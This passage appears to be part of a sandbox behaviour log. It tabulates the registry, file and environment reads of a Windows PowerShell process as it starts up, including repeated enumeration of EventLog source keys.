| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Read | size = 4096, size_out = 4096 |
|
6 | |
| File | Read | size = 4096, size_out = 2530 |
|
1 | |
| File | Read | size = 542, size_out = 0 |
|
1 | |
| File | Read | size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
